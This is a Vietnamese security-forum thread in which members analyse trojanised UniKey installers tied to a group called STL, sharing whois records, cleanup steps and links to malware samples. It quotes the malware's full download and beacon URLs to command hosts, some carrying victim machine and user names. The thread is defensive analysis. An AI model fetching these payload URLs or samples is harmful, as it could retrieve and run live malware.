Đây là 4 file trong thư mục Microsoft Help http://www.mediafire.com/?m5hljr2c17q5ueh Còn đây la file pcap em save lại từ wireshark ( em cho wireshark capture trước rồi chạy file UniKey, để nó chạy khoảng hơn 5 phút rồi save lại ) http://www.mediafire.com/?f0t4rhkavn5nmyf

Phân tích tính chất vài trận DDoS HVA vừa qua.

mv1098 — GMT

Lưu ý: Thư mục "Microsoft Help" không có trong Windows XP, nó sinh ra khi em chạy file Face_UniKey

Phân tích tính chất vài trận DDoS HVA vừa qua.

TQN — GMT

Cảm ơn mv1098. Vì nó mạo danh file của MS nên làm gì verify được signature. Em cứ xoá hết thư mục đó đi. Vào Registry, seach "MsHelpCenter.exe" rồi delete các key, data liên quan. 2 lequy: Toàn bộ file trong BackupUtility cũng là virus, cậu nên kill process BackupSvc, xoá hết các file đó đi, vào Registry search và clean luôn. Hai file exe: BackupScv.exe và DbCompact.exe chỉ làm nhiệm vụ đơn giản, load, tự xoá. Còn toàn bộ code của virus nằm trong file DbEntry1.idx. Dll giả đuôi .idx Cũng là trò mạo danh file của MS. Trong SysInternals Suite, có file sigcheck, để check signature của 1 PE file. Chỉ cần sigcheck , nếu thấy unsigned thì gần như 95% là virus. Trong WinDbg có tool symchk. Các file của MS gần như 100% đều có symbol file đặt trên Symbol Server của họ. Cú pháp: symchk /v Nếu có .pdb, .dbg file về thì gần như an toàn, còn không có mà sigcheck fail nữa thì 100% mày là virus.

Phân tích tính chất vài trận DDoS HVA vừa qua.

lequi — GMT

@TQN: Ok a, e đã copy mấy file này sang một nơi khác và nén lại, phòng hờ khi cần. Vậy sau 7 trang điều tra, mọi người đã có phương án gì để diệt đống này chưa ta ?

Phân tích tính chất vài trận DDoS HVA vừa qua.

TQN — GMT

2 lequy: à quên, anh đang phân tích DbEntry1.idx, nó còn vài thằng bà con nữa: DbEntry2.idx, DbEntry3.idx. Em cứ search DbEntry*.* rồi up lên nhen ! Đống này chắc chắn là "mèo què" của STL, mới hơn MsHelpCenter, build trong thời gian từ 4/3 đến 10/3. Phương án anh đã đề nghị là cứ up hết lên cho các AVs để họ cập nhật. Và dưới đây là hình tui đã debug được con DbEntry1.idx làm gì, down cái gì về:

Down advertise.gif về, giả mã ra PE file, execute nó. Host express.blogdns.info có IP là: 91.211.118.119, vẫn còn sống nhăn răn, nhưng giờ này thì không mở port nào. Vì vậy nên advertise.gif em lấy về không được. IPNetInfo cho ra thông tin sau: Code:

inetnum:         91.211.116.0 - 91.211.119.255
netname:         net-0x2a
descr:           Zharkov Mukola Mukolayovuch
remarks:         Datacentre "0x2a"
country:         UA
org:             ORG-PEZM1-RIPE
admin-c:         ZN210-RIPE
tech-c:          ZN210-RIPE
status:          ASSIGNED PI
mnt-by:          RIPE-NCC-END-MNT
mnt-lower:       RIPE-NCC-END-MNT
mnt-by:          ONIK-MNT
mnt-routes:      ONIK-MNT
mnt-domains:     ONIK-MNT
changed:         support@netassist.kiev.ua 20081211
source:          RIPE

organisation:   ORG-PEZM1-RIPE
org-name:       Private Entreprise Zharkov Mukola Mukolayovuch
org-type:       OTHER
address:        Ukraine, Kyiv, Entuziastov str. 29, of. 42
e-mail:         support@0x2a.com.ua
admin-c:        ZN210-RIPE
phone:          +38-044 587-83-16
mnt-ref:        ONIK-MNT
mnt-by:         ONIK-MNT
changed:        support@netassist.kiev.ua 20091215
source:         RIPE

person:         Zharkov Nikolay
address:        Ukraine, Kyiv, Entuziastov str. 29, of. 42
phone:          +38-044 587-83-16
nic-hdl:        ZN210-RIPE
mnt-by:         ONIK-MNT
changed:        support@netassist.kiev.ua 20081211
source:         RIPE

% Information related to '91.211.116.0/22AS48587'

route:          91.211.116.0/22
descr:          Datacentre "0x2a" Route object
origin:         AS48587
mnt-by:         ONIK-MNT
changed:        pavel@antidot.ua 20081215
source:         RIPE

UA: Ukraina. Không biết có liên quan tới tụi mafia Nga như anh PXMMRF đã nói không ?

Phân tích tính chất vài trận DDoS HVA vừa qua.

lequi — GMT

2 file còn lại nằm cùng thư mục, nhưng vì hôm qua nén lại mấy trăm mb nên e bỏ bớt. http://www.mediafire.com/?7f9ag2r998797gl

Phân tích tính chất vài trận DDoS HVA vừa qua.

conmale — GMT

Tối hôm qua mò vô direct.aliasx.net để xem thử "mệnh lệnh" hiện nay là gì thì không được vì "mệnh lệnh" biến đâu mất tiêu. Hôm nay vô lại thì hoàn toàn không được. Hoá ra:

[conmale]$ whois aliasx.net Whois Server Version 2.0 Domain names in the .com and .net domains can now be registered with many different competing registrars. Go to http://www.internic.net for detailed information. Domain Name: ALIASX.NET Registrar: DIRECTI INTERNET SOLUTIONS PVT. LTD. D/B/A PUBLICDOMAINREGISTRY.COM Whois Server: whois.PublicDomainRegistry.com Referral URL: http://www.PublicDomainRegistry.com Name Server: NS1.SURATIT.IN Name Server: NS2.SURATIT.IN Name Server: NS3.SURATIT.IN Name Server: NS4.SURATIT.IN Status: clientDeleteProhibited Status: clientHold Status: clientTransferProhibited Status: clientUpdateProhibited Updated Date: 25-jul-2011 Creation Date: 08-apr-2011 Expiration Date: 08-apr-2012 >>> Last update of whois database: Wed, 27 Jul 2011 05:50:48 UTC <<< The Registry database contains ONLY .COM, .NET, .EDU domains and Registrars. Registration Service Provided By: SH3LLS Contact: +852.58080443 Website: http://www.sh3lls.net/ Domain Name: ALIASX.NET Registrant: PrivacyProtect.org Domain Admin (contact@privacyprotect.org) ID#10760, PO Box 16 Note - All Postal Mails Rejected, visit Privacyprotect.org Nobby Beach null,QLD 4218 AU Tel. +45.36946676 Creation Date: 08-Apr-2011 Expiration Date: 08-Apr-2012 Domain servers in listed order: ns1.suratit.in ns2.suratit.in ns3.suratit.in ns4.suratit.in Administrative Contact: PrivacyProtect.org Domain Admin (contact@privacyprotect.org) ID#10760, PO Box 16 Note - All Postal Mails Rejected, visit Privacyprotect.org Nobby Beach null,QLD 4218 AU Tel. +45.36946676 Technical Contact: PrivacyProtect.org Domain Admin (contact@privacyprotect.org) ID#10760, PO Box 16 Note - All Postal Mails Rejected, visit Privacyprotect.org Nobby Beach null,QLD 4218 AU Tel. +45.36946676 Billing Contact: PrivacyProtect.org Domain Admin (contact@privacyprotect.org) ID#10760, PO Box 16 Note - All Postal Mails Rejected, visit Privacyprotect.org Nobby Beach null,QLD 4218 AU Tel. +45.36946676 Status:SUSPENDED

Hiện nay đám hosting iWeb và đám domain registrar "SH3LLS" này vẫn còn host một số "kho tàng" của STL. Đám này hết chơi OnlineNIC ở Hồng Kông rồi đến sh3lls cũng ở Hồng Kông, toàn là những nơi tàng chứa những domain frauds. Còn hosting thì kiếm mấy chỗ chai lì để chứa những thứ độc hại. Có lẽ STL nghĩ rằng chuyển sang núp bóng ở Hồng Kông thì tụi FBI không mó tay vô được chắc :-) .

Phân tích tính chất vài trận DDoS HVA vừa qua.

lequi — GMT

@TQN: Trong mớ packet em capture thì cũng thấy URL này, và của e là đây: http://fastupdate.dyndns-office.com/advertise.gif?cv=1&uv=1&uc=0&lrp=4&sye=0&v=0&id=08vWdU7mjkAqVg5oiy7O799iqUzTK46n&als=6D21494831435D&cn=LEQUY-PC&us=LeQuy&qmnhnqzdptpgwfkfkn=prplnfiydcrrmmshaxmypr

Phân tích tính chất vài trận DDoS HVA vừa qua.

conmale — GMT

TQN wrote:

Host express.blogdns.info có IP là: 91.211.118.119, vẫn còn sống nhăn răn, nhưng giờ này thì không mở port nào. Vì vậy nên advertise.gif em lấy về không được. IPNetInfo cho ra thông tin sau: Code:

inetnum:         91.211.116.0 - 91.211.119.255
netname:         net-0x2a
descr:           Zharkov Mukola Mukolayovuch
remarks:         Datacentre "0x2a"
country:         UA
org:             ORG-PEZM1-RIPE
admin-c:         ZN210-RIPE
tech-c:          ZN210-RIPE
status:          ASSIGNED PI
mnt-by:          RIPE-NCC-END-MNT
mnt-lower:       RIPE-NCC-END-MNT
mnt-by:          ONIK-MNT
mnt-routes:      ONIK-MNT
mnt-domains:     ONIK-MNT
changed:         support@netassist.kiev.ua 20081211
source:          RIPE

organisation:   ORG-PEZM1-RIPE
org-name:       Private Entreprise Zharkov Mukola Mukolayovuch
org-type:       OTHER
address:        Ukraine, Kyiv, Entuziastov str. 29, of. 42
e-mail:         support@0x2a.com.ua
admin-c:        ZN210-RIPE
phone:          +38-044 587-83-16
mnt-ref:        ONIK-MNT
mnt-by:         ONIK-MNT
changed:        support@netassist.kiev.ua 20091215
source:         RIPE

person:         Zharkov Nikolay
address:        Ukraine, Kyiv, Entuziastov str. 29, of. 42
phone:          +38-044 587-83-16
nic-hdl:        ZN210-RIPE
mnt-by:         ONIK-MNT
changed:        support@netassist.kiev.ua 20081211
source:         RIPE

% Information related to '91.211.116.0/22AS48587'

route:          91.211.116.0/22
descr:          Datacentre "0x2a" Route object
origin:         AS48587
mnt-by:         ONIK-MNT
changed:        pavel@antidot.ua 20081215
source:         RIPE

UA: Ukraina. Không biết có liên quan tới tụi mafia Nga như anh PXMMRF đã nói không ?

Anh nghĩ không phải mafia Nga gì đâu mà STL cũng có servers bên Ukraine (có lẽ nghĩ rằng host bên Ukraine thì tụi FBI không mó tay vô được :-) ). Chuỗi 91.211.116.0/22 kia cũng chứa trang "tuyệt tác" x-cafevn-db.info trước kia.

Phân tích tính chất vài trận DDoS HVA vừa qua.

texudo — GMT

Qua thông tin X-Cafe và IP, search ra một đống Domain với IP bắt đầu bằng 91.211.116.*. http://bgp.he.net/net/91.211.116.0/22#_dns Chính xác là SINHTULENH rồi: 91.211.116.185 sinhtulenh.org, sinhtuphu.org

Phân tích tính chất vài trận DDoS HVA vừa qua.

conmale — GMT

lequi wrote:

@TQN: Trong mớ packet em capture thì cũng thấy URL này, và của e là đây: http://fastupdate.dyndns-office.com/advertise.gif?cv=1&uv=1&uc=0&lrp=4&sye=0&v=0&id=08vWdU7mjkAqVg5oiy7O799iqUzTK46n&als=6D21494831435D&cn=LEQUY-PC&us=LeQuy&qmnhnqzdptpgwfkfkn=prplnfiydcrrmmshaxmypr

fastupdate.dyndns-office.com resolved về "204.13.248.126" và IP này nằm trong blacklist của nhiều database vì nổi tiếng malware. Nó bị "đóng cửa" từ hồi 2010. IP này trỏ tới hơn 500 hostname, toàn là những thứ "đầu trâu mặt ngựa" của Internet. Không biết phải có liên quan tới STL không.

Phân tích tính chất vài trận DDoS HVA vừa qua.

TQN — GMT

Vậy là với con này, mình đã truy tới ổ của nó rồi. Sorry nhiều anh em, con này down advertise.gif từ 4 host lận. Host nào down không được thì chuyển sang down từ host khác. Trưa nay buồn ngủ nên chỉ debug tới host đầu tiên, tưởng hết nên terminate luôn. Code:

1. http://express.blogdns.info/advertise.gif?cv=1&uv=1&uc=0&lrp=0&sye=0&v=0&id=JF5RfuJw4q8Tbgri83V3FgetMfHLT24p&als=6D21494831435D&cn=abcde&us=abc

2. http://fastupdate.dyndns-office.com/advertise.gif?cv=1&uv=1&uc=0&lrp=0&sye=0&v=0&id=JF5RfuJw4q8Tbgri83V3FgetMfHLT24p&als=6D21494831435D&cn=abcde&us=abc

3. http://hot.enfaqs.com/advertise.gif?cv=1&uv=1&uc=0&lrp=0&sye=0&v=0&id=JF5RfuJw4q8Tbgri83V3FgetMfHLT24p&als=6D21494831435D&cn=abcde&us=abc

4. http://securelogin.doomdns.com/advertise.gif?cv=1&uv=1&uc=0&lrp=0&sye=0&v=0&id=JF5RfuJw4q8Tbgri83V3FgetMfHLT24p&als=6D21494831435D&cn=abc&us=abc

Cảm ơn lequy, cậu không nói thì chắc tui đã không biết và bỏ sót. Trong 4 cái host trên, cái thì chết, cái thì đóng port 80. Chỉ còn một mình thằng fastupdate.dyndns-office.com là còn respond cho lệnh download, và nó chỉ trả về cho em cái này:

fastupdate.dyndns-office.com is offline
fastupdate.dyndns-office.com is offline

fastupdate.dyndns-office.com is currently offline. Please try again later.

Buồn thiệt, không thì anh em ta có được con bot mới nữa rồi. Thôi, nhiệm vụ kế tiếp là up các mẫu MsHelpCenter còn rin extract từ "Unikey độc" (theo anh PXMMRF) của asaxin và BackupUtility lên KIS, MS, Avira...

Phân tích tính chất vài trận DDoS HVA vừa qua.

PXMMRF — GMT

conmale wrote:

PXMMRF wrote:

Ở Việt nam hiện nay, theo tôi, chỉ khoảng 5-8 % người cài win 7, còn lại hầu hết là Win XP. Trong số người cài Win 7, có lẽ tối đa là 30-40% người có thể nhiễm STL trojan thôi. Như thế khó mà tạo lập được mang STL bot với hàng trăm ngàn máy ở VN.
Hì hì, câu này anh Mai nói ngược rồi. Bởi vì hầu hết dùng Windows XP và chỉ có 5-8% dùng Windows 7 (trong số người dùng Windows 7 thỉ chỉ có 30-40% bị nhiễm) cho nên dễ tạo lập được mạng STL bot với hàng trăm ngàn máy ở VN. Sau kết quả điều tra sơ khởi, em thấy cả hệ thống máy của một trường đại học đều ấn định người dùng có chủ quyền "Administrator" và hàng chục doanh nghiệp lớn/vừa cũng không tránh khỏi lỗ hổng này. Trong con số 20 người dùng máy bình mà em hỏi thăm thì 100% là chạy dưới chủ quyền "Administrator". Bởi vậy, dễ tạo lập được mạng STL bot với hàng trăm ngàn máy ở VN chớ không phải "khó" :P .

Hì hì, câu này mình nói với ý khác. Vì axasin thông báo là cài cái Malicious Unikey mà bạn ấy download về chỉ tạo các file virus MSHelpCenter.* trong Windows 7 thôi , còn trong Win XP thì không được (nghĩa là Win XP thì không bị nhiễm virus khi cài malicious Unikey nói trên). Vì số người ở VN dùng Win 7 còn ít, nên tôi suy diễn tiếp theo ý axasin như vậy (cũng có ý rỡn vui với rang0 chút chút) Đây là suy diễn theo nhận định của axasin. Chứ tôi đương nhiên là không nghĩ như vậy. Tôi nghĩ máy trên mạng VN hầu hết là cài Win XP và tỷ lệ máy cài Win XP bị nhiễm STL virus-trojan là rất cao. Cần nói thêm là hiện đang có nhiều loại (version) malicious Unikey và Vietkey trên mạng. Malicious Unikey mà axasin cài khác với của lequi đã cài. Còn có nhiều malicious Unikey khác trên mang nũa. Kinh! [Hì hì các bác đừng gọi là "fake Unikey", vì nó vẫn dùng được để đánh chữ Việt mà. Nên gọi là malicious Unikey (Unikey độc). Giả thì không dùng đươc. Nhưng Unikey nhiễm độc (malicious) thì vẫn dùng được, nhưng lai nguy hiểm cho ta hơn ngàn lần. Hì hì. Nhưng đây chỉ là khuyến cáo vui thôi!] Đúng là hầu hết máy tính cá nhân ở Việt nam (tai tư gia, cơ quan) đều cài đặt cho user dưới quyến admin.. Win XP rõ ràng là cũng hỗ trợ việc này thưc hiện dễ dàng trong quá trình cài đặt nó. Việc phân quyên cho user trên Win XP còn đơn giản và thiếu bảo mật hơn Win 2000. Nhưng nghĩ lai thì lại thấy khó: máy riêng của nó, hay phân cho mình nó dùng tại cơ quan, thì hà cớ gì bắt nó chỉ đươc dùng account restricted hay account limited. Khó thật. Chuyên vui (có thưc): Vừa qua công ty tôi các máy tính bị nhiễm virus nặng nề, lây lan lung tung, mất dữ liêu, do anh em có quyền admin. tự động cài nhiều chương trình game, nghe nhạc nhiễm virus. Tôi nổi điên lên, yêu cầu tất cả công ty mang máy lên văn phòng để phân quyên lại: không cho dùng quyên admin, chỉ cho dùng quyền restricted hay limited. Gần trăm máy mang lên, xếp hàng, trông hết hồn. Lệnh đã ra phải làm, không kỳ. Tôi và 2 lão Kỹ sư IT phải mất gần 3 ngày để phân quyền, dọn dep rác rưởi, update antivirus và cài lai các máy in, máy scan, nâng cấp RAM.... Mệt quá. Nhưng rõ ràng sau đó tình hình đỡ hơn nhiều. Gần đây lai phải tổ chức 1 lớp hoc sử dung máy tính trong nôi bộ cơ quan..... To "TQN". Ucraina có một mối quan hệ rất sâu sắc với TQ, đăc biệt trong thời kỳ tổng thống cũ, khi mà môi quan hệ giữa Nga và Ukrain xấu, rạn nứt. TQ trơ giúp Ucrain rất nhiều về Ktế và đầu tư một số vốn khá lơn vào nước này

Phân tích tính chất vài trận DDoS HVA vừa qua.

PXMMRF — GMT

Như vậy là cho đến nay chúng ta đã phát hiện ra khoảng 10 domain STL sử dung cho 10 master website-webserver khác nhau. Một số website-webserver đã tạm thời ngưng hoăc mất domain. Vấn đề chúng ta chưa xác định thật rõ là website-webserver nào đang in-charge (đang làm nhiệm vụ DDoS), như đang DDoS vào HVA chẳng hạn, cái nào đã thôi dùng.? Chúng ta cũng chưa phân tích và tổng hơp các thông tin về nguồn (website, webserver) mà STL hay người khác (bị STL lơi dung) dùng để phát tán virus, thí dụ http://nethoabinh.com/ mà lequi đã xác nhận. Về virus-trojan chúng ta cũng còn chưa rõ là ngoài nhóm file MShelpcenter.*... tạo ra từ malicious Unikey mà lequi download về từ đường dẫn của http://nethoabinh.com/, có còn có các nhóm file loại khác, tên khác nhưng công dung tương tự không?. MShelpcenter.* files có là những file mới nhất của STL không.? STL cũng nhúng virus-Trojan vào các file Vietkey (2000-2002-2007) đang được upload rất nhiêu trên mạng. Chúng đươc STL nhúng vào các virus-trojan loai gì, có giống như ở Unikey không? Còn phải kể những file Adobe flash Player dễ dàng download trên mạng, cũng thường bị STL nhúng virus-trojan vào. Rõ ràng đang còn rất nhiều vấn đề cần phải nghiên cứu, tìm hiểu và giải quyết.

Phân tích tính chất vài trận DDoS HVA vừa qua.

acoustics89 — GMT

Bận quá, giờ mới mò vào xem được, topic tăng nhanh quá. Hay bây giờ thành lập 1 đội đi ạ, phân công ai phân tích cái gì. Chứ bây giờ ví dụ như em tải cái bộ Backup của bạn Lequi về phân tích cũng mất công, vì đa số anh em khác làm rồi. nhưng kể ra làm 1 đội cũng khó, vì đa phần anh em dùng thời gian rảnh để làm, có người bận lúc này lúc khác Các anh có ý kiến gì để làm việc hiệu quả hơn không

Phân tích tính chất vài trận DDoS HVA vừa qua.

rang0 — GMT

Gửi anh PXMMRF, Hôm nay em ngồi đọc lại, thấy còn 1 bộ Unikey "độc" mà gần đây nhất được upload trên trang download.com.vn, hình như nay đã được gỡ xuống, chính nó drop ra file TeamViewer "giả" và file uxtheme.manifest "giả". Vào thời điểm anh TQN phân tích thì cái server của nó vẫn còn sống, và anh TQN có down về được 2 files : flower.bmp và BlueSphere.bmp. File BlueSphere.bmp decrypt ra nó chính là 1 file .exe, mạo danh thành file svchost.exe, tại thời điểm đó thì file .exe này chưa làm gì cả, và sẽ được cập nhật trong thời gian không xa. Hiện tại bọn STL đang "tạm thời" off server đó, chỉ không biết một ngày đẹp trời nào đó nó sẽ được bật lại để cập nhật hay không mà thôi ? Hay bọn chúng đành hi sinh con malware và server này vì bị phát hiện quá sớm. Code:

URL1: http://speed.cyline.org:443/flower.bmp?g={1CD70F27-EA66-4812-834C-FB39AE2DC170}&c=1&v=1&tf=312218282815&tr=312218282861&t=312218282864&p=2&e=0&n=ThangChaMayTuiSTL&u=OngNoiMayNe&lfhbbnwdbywxlineyegfswjxylrktvvfjqlr=vznmbfhxpgocvojqhosgdbenhrjtnglagonsvca
URL2: http://speed.cyline.org:443/BlueSphere.bmp?dl=1&oyeerpsaahqumkthxeswvwlfdxpizmffsfk=njhkmdjqlnkwmrofymzmxgqf

Phân tích tính chất vài trận DDoS HVA vừa qua.

conmale — GMT

Tớ vừa thử nghiệm thì 3 copies khác nhau của unikey download từ - nethoabinh.com - code.google.com: http://code.google.com/p/vietnam-unikey/downloads/detail?name=Uk40RC1ntSetup.exe&can=2&q= - sourceforge: http://en.sourceforge.jp/projects/sfnet_unikey/downloads/unikey-win/4.0%20RC1/Uk40RC1ntSetup.exe/) đều y như nhau và đều là malware.. Bản trên code.google.com được upload ngày 17 tháng 3 năm 2010. Bản trên sourceforge được upload ngày 19 tháng 4 năm 2006. Cả ba bản trên có y hệt checksum và nội dung y hêt nhau. Chỉ còn 1 cách là gởi thông tin đến tất cả các cty antivirus.

Phân tích tính chất vài trận DDoS HVA vừa qua.

rang0 — GMT

conmale wrote:

- sourceforge: http://en.sourceforge.jp/projects/sfnet_unikey/downloads/unikey-win/4.0%20RC1/Uk40RC1ntSetup.exe/)

Em vừa down thử từ nguồn này về, thấy nó sạch mà anh !?

Phân tích tính chất vài trận DDoS HVA vừa qua.

conmale — GMT

acoustics89 wrote:

Bận quá, giờ mới mò vào xem được, topic tăng nhanh quá. Hay bây giờ thành lập 1 đội đi ạ, phân công ai phân tích cái gì. Chứ bây giờ ví dụ như em tải cái bộ Backup của bạn Lequi về phân tích cũng mất công, vì đa số anh em khác làm rồi. nhưng kể ra làm 1 đội cũng khó, vì đa phần anh em dùng thời gian rảnh để làm, có người bận lúc này lúc khác Các anh có ý kiến gì để làm việc hiệu quả hơn không

Anh nghĩ có 3 mảng để lo: 1. RE. 2. Trace net và xác định mạng hoạt động của malware. 3. Report cho các nhóm antiviruses và các nhóm chức năng. Nếu cần làm việc hữu hiệu có lẽ cần phải tạo một group list (dùng google group chẳng hạn). Trong đó, thành viên của nhóm liên lạc qua group và chỉ nên công bố thông tin trên diễn đàn sau khi tìm ra kết quả hoặc nếu cần các thành viên trên diễn đàn đóng góp thêm thông tin, mẫu mã.

Phân tích tính chất vài trận DDoS HVA vừa qua.

mv1098 — GMT

conmale wrote:

Tớ vừa thử nghiệm thì 3 copies khác nhau của unikey download từ - sourceforge: http://en.sourceforge.jp/projects/sfnet_unikey/downloads/unikey-win/4.0%20RC1/Uk40RC1ntSetup.exe/) đều y như nhau và đều là malware.. Bản trên code.google.com được upload ngày 17 tháng 3 năm 2010. Bản trên sourceforge được upload ngày 19 tháng 4 năm 2006. Cả ba bản trên có y hệt checksum và nội dung y hêt nhau. Chỉ còn 1 cách là gởi thông tin đến tất cả các cty antivirus.

Thằng này em chạy cũng sạch luôn, ko thấy sinh ra mấy cái folder với file .exe nào cả

Phân tích tính chất vài trận DDoS HVA vừa qua.

conmale — GMT

rang0 wrote:

conmale wrote:

- sourceforge: http://en.sourceforge.jp/projects/sfnet_unikey/downloads/unikey-win/4.0%20RC1/Uk40RC1ntSetup.exe/)
Em vừa down thử từ nguồn này về, thấy nó sạch mà anh !?

Lạ vậy? Anh download từ nguồn sourceforge ở trên, cái binary y hệt như từ trang nethoabinh.com. Không lẽ anh download bản bị cached ở đâu đó chớ không phải bản chính thức từ sourceforge?

Phân tích tính chất vài trận DDoS HVA vừa qua.

mv1098 — GMT

@TQN http://fastupdate.dyndns-office.com/ Emm có vào site này có thông báo Code:

fastupdate.dyndns-office.com is offline

fastupdate.dyndns-office.com is currently offline. Please try again later.

Theo em host này đã đc cấu hình, nếu không đúng User-Agent nó sẽ wwwect sang cái thông báo trên Còn cái thông báo đó chỉ để "lừa tình" mọi người thôi, mọi người sẽ nghĩ nó offline thật, vì theo em biết dyndns không hỗ trợ những thông báo như vậy

Phân tích tính chất vài trận DDoS HVA vừa qua.

mv1098 — GMT

Check từ http://fastupdate.dyndns-office.com/ nó ra cái này Code:

301 Moved Permanently

Moved Permanently

The document has moved here.

Apache/2.2.3 (CentOS) Server at 216.55.166.13 Port 80

Check cái http://www.k9activewear.com Code:

Registrar: GODADDY.COM, INC.
Whois Server: whois.godaddy.com
Referral URL: http://registrar.godaddy.com
Status: clientDeleteProhibited, clientRenewProhibited, clientTransferProhibited, clientUpdateProhibited

Expiration Date: 2012-07-04
Creation Date: 2011-07-04
Last Update Date: 2011-07-04

Name Servers:
    ns77.domaincontrol.com
    ns78.domaincontrol.com
See k9activewear.com DNS Records

Information Updated: Wed, 27 Jul 2011 10:47:41 UTC

Creation Date: 2011-07-04 <-- Mới tinh luôn Lại Prohibited hehe mấy anh này nguỵ trang kiểu ÚC rồi

Phân tích tính chất vài trận DDoS HVA vừa qua.

lequi — GMT

@mv1098: Mình đã thử thay đổi User-Agent cho đúng với User-Agent mà "bọn" virus request, nhưng vẫn ra 1 kết quả đó. Vả lại trong quá tình capture packet, kết quả trả về vẫn giống với kết quả truy cập từ trình duyệt.

Phân tích tính chất vài trận DDoS HVA vừa qua.

mv1098 — GMT

Mình vào thẳng ip http://204.13.248.126/ nó cũng thông báo như vậy, check port 80 vẫn thấy open Có lẽ chủ host đã thay đổi User-Agent hoặc muốn giữ lại cái host này nên mới để thông báo như vậy chứ không tắt hẳn đi như mấy host khác

Phân tích tính chất vài trận DDoS HVA vừa qua.

exception — GMT

Cái IP đó là của offline.mydyndns.org. Bọn STL dùng dynamic dns, giờ nó cho dịch vụ update dns dynamic off rồi, thì tụi dyndns nó báo wwwect về domain đó; hoặc nó wwwect DNS về đó, không có gì đặc biệt ở cái DNS này đâu.

Phân tích tính chất vài trận DDoS HVA vừa qua.

ga_cum06 — GMT

conmale wrote:

acoustics89 wrote:

Bận quá, giờ mới mò vào xem được, topic tăng nhanh quá. Hay bây giờ thành lập 1 đội đi ạ, phân công ai phân tích cái gì. Chứ bây giờ ví dụ như em tải cái bộ Backup của bạn Lequi về phân tích cũng mất công, vì đa số anh em khác làm rồi. nhưng kể ra làm 1 đội cũng khó, vì đa phần anh em dùng thời gian rảnh để làm, có người bận lúc này lúc khác Các anh có ý kiến gì để làm việc hiệu quả hơn không
Anh nghĩ có 3 mảng để lo: 1. RE. 2. Trace net và xác định mạng hoạt động của malware. 3. Report cho các nhóm antiviruses và các nhóm chức năng. Nếu cần làm việc hữu hiệu có lẽ cần phải tạo một group list (dùng google group chẳng hạn). Trong đó, thành viên của nhóm liên lạc qua group và chỉ nên công bố thông tin trên diễn đàn sau khi tìm ra kết quả hoặc nếu cần các thành viên trên diễn đàn đóng góp thêm thông tin, mẫu mã.

em cũng vừa nghĩ đến vấn đề này, thà rằng tạo 1 team âm thầm làm việc và chỉ public khi công việc đến mức độ nào đó. em thấy các anh cứ làm việc rồi lại mất ngồi post lên thế này khá mất thời gian :D mà lại đánh rắn động cỏ ...nếu được em xin 1 chân ở trong group nào đó :D Ý kiến của em là nên lập 1 nhóm tuyên truyền .Hướng dẫn kĩ thuật tìm và diệt malware, cho member ở các forum khác. các phần mềm đã bị fake nên có hướng dẫn cụ thể đâu là thật đâu là giả và lấy từ nguồn nào tốt nhất,chắc chắn chúng ta không thể loại hoàn toàn được malware của STL nhưng cũng đỡ đi phần nào, để chúng nó thấy anh em hva cũng biết cách phản công chứ không chỉ ngồi phân tích cái đống code của chúng. Đã đến lúc mọi người chung tay góp sức, làm việc có kế hoạch và bài bản để đạt được kết quả cao nhất :D O-)

Phân tích tính chất vài trận DDoS HVA vừa qua.

TQN — GMT

Không sao đâu ga_cum06. Chiến dịch này của stl là chiến dịch thứ 3, thứ 4 rồi, còn chiến dịch của HVA chúng ta là chiến dịch đầu tiên, công khai, đánh thẳng, trực diện vào mặt chúng, phổ biến rộng rãi, công khai. Tới ngày hôm nay, sau khi đa số host của stl đã bị, được close, tình trạng DDOS của chúng vào HVA đã gần hết, các "mèo đui, mèo què" của chúng bị anh em ta và các AVs chụp gần hết, thì em đã có thể thẳng ngực tuyên bố: chúng ta đã thành công (phần nào đó thôi), đã làm cho tụi stl run sợ, chùng tay, không còn lộng hành công khai như trước nữa, không còn dám coi thường người khác nữa, đã lên tiếng cho cộng đồng Internet VN ta biết về đại dịch stl này, cảnh báo mọi người về sự nguy hiểm của "mèo què", của các phần mềm cờ rắc, download bậy bạ. Chắc đã đến lúc chúng ta nên phổ biến kỹ thuật RCE, kỹ thuật phòng, chống, loại bỏ virus qua các seminar, các bài viết. Ai biết 1 tham gia 1, ai biết 10 thì tham gia 10. Sau khi em phổ biến tên các virus của stl lên facebook, các forum, em nhận thấy nhận thức của nhiều người rất kém về virus. Vd: Có cậu cứ la làng: Kis tui là Kis bản quyền, cập nhật thường xuyên, thì làm sao có virus được. Thậm chí như Avira vừa rồi, update đống BackupSvc lên, còn report cho em như sau: http://analysis.avira.com/samples/details.php?uniqueid=KcAZAjtnOS4VD6kgfsrWYGchX1gq6Lvn&incidentid=791390 Clean sạch hết, mà là Trojan.Downloader 100% đấy. Bó tay. Em cạch, không dám tin tưởng 100% vào các AVs nữa.

Phân tích tính chất vài trận DDoS HVA vừa qua.

lequi — GMT

Qua vụ này, em càng thêm bớt tin tưởng vào các AVs, mà hiện tại em gỡ KIS rồi, cài CMC Free, sao lại hông có ông nào diệt mấy con e post lên đây hết hở a bolzano_1989 ? Qua vụ này em cũng càng muốn biết về RCE 1/xxxx công lực của a TQN :-<

Phân tích tính chất vài trận DDoS HVA vừa qua.

TQN — GMT

Nếu công lực "A rờ ci i" của anh nhỏ hơn 1 thì sao lequy ?

Phân tích tính chất vài trận DDoS HVA vừa qua.

ptv_vbhp — GMT

TQN wrote:

Em cạch, không dám tin tưởng 100% vào các AVs nữa.

Em lúc trước mua con lap được khuyến mại bkav pro 3 tháng. Định ko dùng đâu nhưng mà free thì cũng cứ dùng cho đỡ phí(sinh viên mà). Mấy hôm nay nghe thấy vụ này cũng lên down mấy mẫu về xem bkav làm ăn thế nào thế mà nó cũng chén sạch anh ạ :D . Em nghĩ có khi bkav của anh "quảng bomb" cũng đang "âm thầm" theo chân đám mèo què ấy chứ :P

Phân tích tính chất vài trận DDoS HVA vừa qua.

acoustics89 — GMT

TQN wrote:

Thậm chí như Avira vừa rồi, update đống BackupSvc lên, còn report cho em như sau: http://analysis.avira.com/samples/details.php?uniqueid=KcAZAjtnOS4VD6kgfsrWYGchX1gq6Lvn&incidentid=791390 Clean sạch hết, mà là Trojan.Downloader 100% đấy. Bó tay. Em cạch, không dám tin tưởng 100% vào các AVs nữa.

